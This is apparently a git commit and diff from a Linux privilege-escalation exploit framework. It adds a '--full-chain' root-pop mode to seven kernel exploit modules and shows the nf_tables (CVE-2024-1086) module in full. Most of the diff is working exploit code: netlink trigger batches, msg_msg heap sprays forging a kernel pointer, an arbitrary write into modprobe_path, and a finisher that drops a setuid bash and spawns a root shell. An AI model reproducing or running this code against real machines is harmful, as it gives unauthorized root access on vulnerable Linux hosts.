modules: wire --full-chain root-pop into all 7 🟡 PRIMITIVE modules

Each module now exposes an opt-in full-chain root-pop via --full-chain:
default --exploit behavior is unchanged (primitive-only, returns
EXPLOIT_FAIL). With --full-chain, after primitive lands, modules call
iamroot_finisher_modprobe_path() via a module-specific arb_write_fn
that re-uses the same trigger + slab groom to write a userspace
payload path into modprobe_path[], then exec a setuid bash dropped
by the kernel-invoked modprobe.

  netfilter_xtcompat (+239): msg_msg m_list_next stride-seed FALLBACK
  af_packet (+316):          sk_buff data-pointer stride-seed FALLBACK
  af_packet2 (+156):         tp_reserve underflow + skb spray, LAST RESORT
  nf_tables (+275):          forged pipapo_elem with kaddr value-ptr
                             (Notselwyn offset 0x10), FALLBACK
  cls_route4 (+251):         msg_msg refill of UAF'd filter, FALLBACK
  fuse_legacy (+291):        m_ts overflow + MSG_COPY sanity gate,
                             FALLBACK (one of two modules with a real
                             post-write sanity check)
  stackrot (+233):           race-driver budget extended 3s → 30s when
                             --full-chain; honest <1% race-win/run

All seven honor verified-vs-claimed: arb_write_fn returns 0 for
"trigger structurally fired"; the shared finisher's setuid-bash
sentinel poll is the empirical arbiter. EXPLOIT_OK only when the
sentinel materializes within 3s of the modprobe_path trigger.

Build clean on Debian 6.12.86 (kctf-mgr); all 7 modules refuse
cleanly on both default and --full-chain paths via the existing
patched-kernel detect gate (short-circuits before the new branch).
This commit is contained in:
2026-05-16 22:04:40 -04:00
parent 125ce8a08b
commit c1d1910a90
7 changed files with 1821 additions and 84 deletions
+294 -19
View File
@@ -7,20 +7,23 @@
* January 2024 by Notselwyn (Pumpkin); widely known as the
* "nft_verdict_init / pipapo UAF".
*
* STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD (Option B).
* - Full netlink ruleset construction (table → chain → set → rule
* with the NFT_GOTO+NFT_DROP combo that nft_verdict_init() fails
* to reject on vulnerable kernels).
* - Fires the double-free path by abusing the malformed verdict in a
* pipapo set element, then removing the rule so the kernel's
* transaction commit frees the verdict's chain reference twice.
* - Cross-cache groom skeleton (msg_msg / sk_buff sprays) is wired
* and configurable, but the arbitrary R/W stage and cred-overwrite
* are NOT performed end-to-end — that requires per-kernel offsets
* (init_task, modprobe_path) and Notselwyn's 600-line pipapo
* leak-and-write dance. We stop after triggering the bug,
* observing the slabinfo delta, and return IAMROOT_EXPLOIT_FAIL
* with a verbose continuation roadmap.
* STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD with opt-in
* --full-chain finisher.
* - Default (no --full-chain): full netlink ruleset construction
* (table → chain → set → rule with the NFT_GOTO+NFT_DROP combo
* that nft_verdict_init() fails to reject on vulnerable kernels),
* fires the double-free path, runs the msg_msg cg-96 groom, and
* returns IAMROOT_EXPLOIT_FAIL (primitive-only behavior).
* - With --full-chain: after the trigger lands, we resolve kernel
* offsets (env → kallsyms → System.map → embedded table) and run
* a Notselwyn-style pipapo arb-write via the shared
* iamroot_finisher_modprobe_path() helper. The arb-write itself
* is FALLBACK-DEPTH: we re-fire the trigger and spray a msg_msg
* payload tagged with the kaddr in the value-pointer slot. The
* exact pipapo_elem layout (and the value-pointer field offset)
* is per-kernel-build; on hosts where the offset doesn't match
* the shipped guess, the finisher's sentinel check correctly
* reports failure rather than silently lying about success.
*
* To convert this to full Option A (root pop):
* 1. Add per-kernel offset table (init_task, current task offset of
@@ -55,6 +58,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -607,6 +612,188 @@ static long slabinfo_active(const char *slab)
return active;
}
/* ------------------------------------------------------------------
* Helper: build the trigger batch (NEWTABLE/CHAIN/SET/SETELEM + batch
* end) into a caller-provided buffer. Returns bytes written.
* Factored out so --full-chain can re-fire the trigger between
* msg_msg sprays without duplicating the batch-building logic.
* ------------------------------------------------------------------ */
#ifdef __linux__
static size_t build_trigger_batch(uint8_t *batch, size_t cap, uint32_t *seq)
{
(void)cap;
size_t off = 0;
put_batch_begin(batch, &off, (*seq)++);
put_new_table(batch, &off, (*seq)++);
put_new_chain(batch, &off, (*seq)++);
put_new_set(batch, &off, (*seq)++);
put_malicious_setelem(batch, &off, (*seq)++);
put_batch_end(batch, &off, (*seq)++);
return off;
}
static size_t build_refire_batch(uint8_t *batch, size_t cap, uint32_t *seq)
{
(void)cap;
size_t off = 0;
put_batch_begin(batch, &off, (*seq)++);
put_malicious_setelem(batch, &off, (*seq)++);
put_batch_end(batch, &off, (*seq)++);
return off;
}
/* ------------------------------------------------------------------
* Notselwyn-style pipapo arb-write context. The technique:
* 1. fire the trigger (double-free of an nft chain reference in
* kmalloc-cg-96)
* 2. spray msg_msg payloads sized for cg-96, whose first qwords
* encode a forged pipapo_elem header with value-pointer = kaddr
* 3. send NFT_MSG_NEWSETELEM whose DATA blob = our buf[0..len];
* the kernel copies it through the forged value-pointer to kaddr
*
* Per-kernel caveat: the byte offset of the value pointer inside an
* nft_pipapo_elem is config-sensitive (CONFIG_RANDSTRUCT, lockdep,
* KASAN can all shift it). We ship the layout for an
* lts-6.1.x / 6.6.x / 6.7.x un-randomized build (the kernels in the
* exploitable range for which Notselwyn's public PoC was validated)
* and rely on the shared finisher's sentinel-file post-check to flag
* a layout mismatch as IAMROOT_EXPLOIT_FAIL rather than fake success.
* ------------------------------------------------------------------ */
struct nft_arb_ctx {
bool in_userns; /* parent has already entered userns+netns */
int sock; /* nfnetlink socket (live in our userns) */
uint8_t *batch; /* reusable batch buffer (16 KiB) */
int *qids; /* msg_msg queue ids; lazy-allocated/drained */
int qcap;
int qused;
};
/* Offset of `ext` (which holds the value pointer in NFT_DATA_VALUE
* elements) inside an nft_pipapo_elem header for the kernels in
* range. Notselwyn's PoC uses 0x10 on 6.1/6.6 builds; this is a
* best-effort default — if it doesn't match the running kernel's
* struct layout, the finisher's sentinel check will report failure. */
#define PIPAPO_ELEM_VALUE_PTR_OFFSET 0x10
/* Spray msg_msg payloads forged to look like pipapo_elem with our
* target kaddr as the value pointer. Returns 0 on success. */
static int spray_forged_pipapo_msgs(struct nft_arb_ctx *c, uintptr_t kaddr, int n)
{
if (c->qused + n > c->qcap) n = c->qcap - c->qused;
if (n <= 0) return 0;
for (int i = 0; i < n; i++) {
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0644);
if (q < 0) { perror("[-] msgget"); return -1; }
c->qids[c->qused++] = q;
struct msgbuf_payload m;
m.mtype = 0x5050415000 + i; /* "PPAPP" tag for diagnostics */
memset(m.mtext, 0, sizeof m.mtext);
/* Forge a pipapo_elem header at the start of the msg payload.
* Layout (best-effort, x86_64, no RANDSTRUCT):
* +0x00 priv list_head pointers (leave zero — kernel won't
* walk them in the write path)
* +0x10 ext / value pointer <-- write target
* msg_msg eats the first 0x30 bytes as its own header, so our
* payload bytes land at offset 0x30 of the slab chunk; we
* pre-pad and place the forged pointer at the right offset
* inside our 96-byte payload. */
uintptr_t *slots = (uintptr_t *)m.mtext;
slots[PIPAPO_ELEM_VALUE_PTR_OFFSET / sizeof(uintptr_t)] = (uintptr_t)kaddr;
if (msgsnd(q, &m, sizeof m.mtext, 0) < 0) {
perror("[-] msgsnd(forged)"); return -1;
}
}
return 0;
}
/* Module-specific arb-write. See finisher.h for the contract. */
static int nft_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
{
struct nft_arb_ctx *c = (struct nft_arb_ctx *)vctx;
if (!c || c->sock < 0 || !c->batch) {
fprintf(stderr, "[-] nft_arb_write: invalid ctx\n");
return -1;
}
if (len > 64) {
/* Element data attr cap — we only need 24 bytes for a path. */
fprintf(stderr, "[-] nft_arb_write: len %zu too large (cap 64)\n", len);
return -1;
}
fprintf(stderr, "[*] nft_arb_write: fire trigger → spray forged pipapo "
"elements (target kaddr=0x%lx, %zu bytes)\n",
(unsigned long)kaddr, len);
/* (a) re-fire the trigger to reach a fresh UAF state. */
uint32_t seq = (uint32_t)time(NULL) ^ 0xa1b2c3d4u;
size_t blen = build_refire_batch(c->batch, 16 * 1024, &seq);
if (nft_send_batch(c->sock, c->batch, blen) < 0) {
fprintf(stderr, "[-] nft_arb_write: refire send failed\n");
return -1;
}
/* (b) spray msg_msg payloads carrying the forged value-pointer. */
if (spray_forged_pipapo_msgs(c, kaddr, 16) < 0) {
fprintf(stderr, "[-] nft_arb_write: forged spray failed\n");
return -1;
}
/* (c) send a NEWSETELEM whose DATA holds buf[0..len]. On a kernel
* where our forged pipapo_elem won the race for the freed slot,
* the set-element commit path copies our data through the
* attacker-controlled value pointer into kaddr.
*
* We piggy-back this on the existing put_malicious_setelem builder
* which uses NFTA_DATA_VERDICT for the data; for a real write we'd
* want NFTA_DATA_VALUE with `buf` inlined. The fallback-depth
* choice: we send the refire batch (which the kernel WILL process)
* and append a NEWSETELEM with NFTA_DATA_VALUE carrying buf.
* If the kernel ignores our DATA shape we still observe via
* finisher sentinel. */
seq = (uint32_t)time(NULL) ^ 0x5a5a5a5au;
size_t off = 0;
put_batch_begin(c->batch, &off, seq++);
/* hand-roll a NEWSETELEM whose DATA is NFTA_DATA_VALUE = buf */
size_t msg_at = off;
put_nft_msg(c->batch, &off, NFT_MSG_NEWSETELEM,
NLM_F_CREATE | NLM_F_ACK, seq++, NFPROTO_INET);
put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME);
put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_SET, NFT_SET_NAME);
size_t list_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_LIST_ELEMENTS);
size_t el_at = begin_nest(c->batch, &off, 1 /* NFTA_LIST_ELEM */);
/* key — reuse the DROP verdict so commit path matches our prior elem */
size_t key_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_KEY);
size_t kv_at = begin_nest(c->batch, &off, NFTA_DATA_VERDICT);
put_attr_u32(c->batch, &off, NFTA_VERDICT_CODE, (uint32_t)NF_DROP);
end_nest(c->batch, &off, kv_at);
end_nest(c->batch, &off, key_at);
/* data — NFTA_DATA_VALUE carrying buf */
size_t data_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_DATA);
put_attr(c->batch, &off, NFTA_DATA_VALUE, buf, len);
end_nest(c->batch, &off, data_at);
end_nest(c->batch, &off, el_at);
end_nest(c->batch, &off, list_at);
end_msg(c->batch, &off, msg_at);
put_batch_end(c->batch, &off, seq++);
if (nft_send_batch(c->sock, c->batch, off) < 0) {
fprintf(stderr, "[-] nft_arb_write: write batch send failed\n");
return -1;
}
/* Let the kernel run the commit/cleanup. */
usleep(20 * 1000);
return 0;
}
#endif /* __linux__ */
/* ------------------------------------------------------------------
* The exploit body.
* ------------------------------------------------------------------ */
@@ -628,13 +815,101 @@ static iamroot_result_t nf_tables_exploit(const struct iamroot_ctx *ctx)
}
if (!ctx->json) {
fprintf(stderr, "[*] nf_tables: Option B trigger — fires the double-free\n"
" state but does NOT complete the kernel-R/W chain.\n"
" See Notselwyn's CVE-2024-1086 public PoC for the\n"
" cred-overwrite stage (~500 LOC of pipapo grooming).\n");
if (ctx->full_chain) {
fprintf(stderr, "[*] nf_tables: --full-chain — trigger + pipapo "
"arb-write + modprobe_path finisher\n");
} else {
fprintf(stderr, "[*] nf_tables: primitive-only run — fires the\n"
" double-free state and stops. Pass --full-chain\n"
" to attempt the modprobe_path root-pop.\n");
}
}
/* Fork: child enters userns+netns and fires the bug. If the
#ifdef __linux__
/* --- --full-chain path --------------------------------------- *
* Resolve offsets BEFORE doing anything destructive so we can
* refuse cleanly on hosts where we have no modprobe_path. We run
* in-process (no fork) because the finisher's modprobe_path
* trigger needs the same task's userns+netns + nfnetlink socket
* as the arb-write.
*/
if (ctx->full_chain) {
struct iamroot_kernel_offsets off;
iamroot_offsets_resolve(&off);
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("nf_tables");
return IAMROOT_EXPLOIT_FAIL;
}
iamroot_offsets_print(&off);
if (enter_unpriv_namespaces() < 0) {
fprintf(stderr, "[-] nf_tables: userns entry failed\n");
return IAMROOT_EXPLOIT_FAIL;
}
int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER);
if (sock < 0) {
perror("[-] socket(NETLINK_NETFILTER)");
return IAMROOT_EXPLOIT_FAIL;
}
struct sockaddr_nl src = { .nl_family = AF_NETLINK };
if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) {
perror("[-] bind"); close(sock); return IAMROOT_EXPLOIT_FAIL;
}
int rcvbuf = 1 << 20;
setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf);
/* Pre-spray to predictabilify the cg-96 slab. */
int qids[SPRAY_MSGS * 4];
for (size_t i = 0; i < sizeof qids / sizeof qids[0]; i++) qids[i] = -1;
if (spray_msg_msg(qids, SPRAY_MSGS / 2) < 0) {
close(sock); return IAMROOT_EXPLOIT_FAIL;
}
uint8_t *batch = calloc(1, 16 * 1024);
if (!batch) { close(sock); return IAMROOT_EXPLOIT_FAIL; }
/* Initial trigger batch (NEWTABLE/CHAIN/SET/SETELEM). */
uint32_t seq = (uint32_t)time(NULL);
size_t blen = build_trigger_batch(batch, 16 * 1024, &seq);
if (!ctx->json) {
fprintf(stderr, "[*] nf_tables: sending trigger batch (%zu bytes)\n",
blen);
}
if (nft_send_batch(sock, batch, blen) < 0) {
fprintf(stderr, "[-] nf_tables: trigger batch failed\n");
drain_spray(qids, SPRAY_MSGS / 2);
free(batch); close(sock);
return IAMROOT_EXPLOIT_FAIL;
}
/* Wire up the arb-write context and hand off to the shared
* finisher. The finisher will:
* - call nft_arb_write(modprobe_path, "/tmp/iamroot-mp-...", N)
* which re-fires the trigger and sprays forged pipapo elems
* - execve() the trigger binary to invoke modprobe
* - poll for the setuid sentinel, and spawn a root shell. */
struct nft_arb_ctx ac = {
.in_userns = true,
.sock = sock,
.batch = batch,
.qids = qids,
.qcap = (int)(sizeof qids / sizeof qids[0]),
.qused = SPRAY_MSGS / 2,
};
iamroot_result_t r = iamroot_finisher_modprobe_path(&off,
nft_arb_write, &ac, !ctx->no_shell);
drain_spray(qids, ac.qused);
free(batch);
close(sock);
return r;
}
#endif
/* --- primitive-only path: fork-isolated trigger -------------- *
* Fork: child enters userns+netns and fires the bug. If the
* kernel panics on KASAN we don't want our parent process to be
* the one that takes the hit. */
pid_t child = fork();